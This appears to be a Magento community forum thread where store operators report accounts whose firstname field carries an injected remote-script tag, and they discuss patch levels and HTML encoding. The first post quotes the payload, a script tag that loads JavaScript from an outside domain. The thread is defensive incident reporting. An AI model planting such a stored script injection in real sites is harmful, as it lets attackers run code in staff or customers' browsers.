cancel
Showing results for 
Search instead for 
Did you mean: 

Hacking Attempts

Hacking Attempts

Had a new one today whereby the attacker uses the firstname field to put a link in to some remote javascript.

 

When you go to delete the account on a fully patched store you are prevented from doing so by returning invalid form key and the account must be deleted from the Manage Customer Grid.

 

<script src=//zs.mk/i></script>
4 REPLIES

Re: Hacking Attempts

Hi,

Which version of Magento 1 are you using? Do you have all patches applied?

-----
Anna from E-CONOMIX

Re: Hacking Attempts

Had this same issue. For whatever reason the payment failed and order was not created. Will follow up if it happens. we are fully patched on Magento 1.9 latest version. 

Re: Hacking Attempts

We just had the same exact hack on a customer site. We were fully patched up to the latest version. Does anyone have any information about this hack? There seems to be some vulnerability in Magento.

Re: Hacking Attempts

Hi @ddsgadget,

 

Can you confirm if that value is stored into the database as html entities?

--
If you've found one of my answers useful, please give "Kudos" or "Accept as Solution"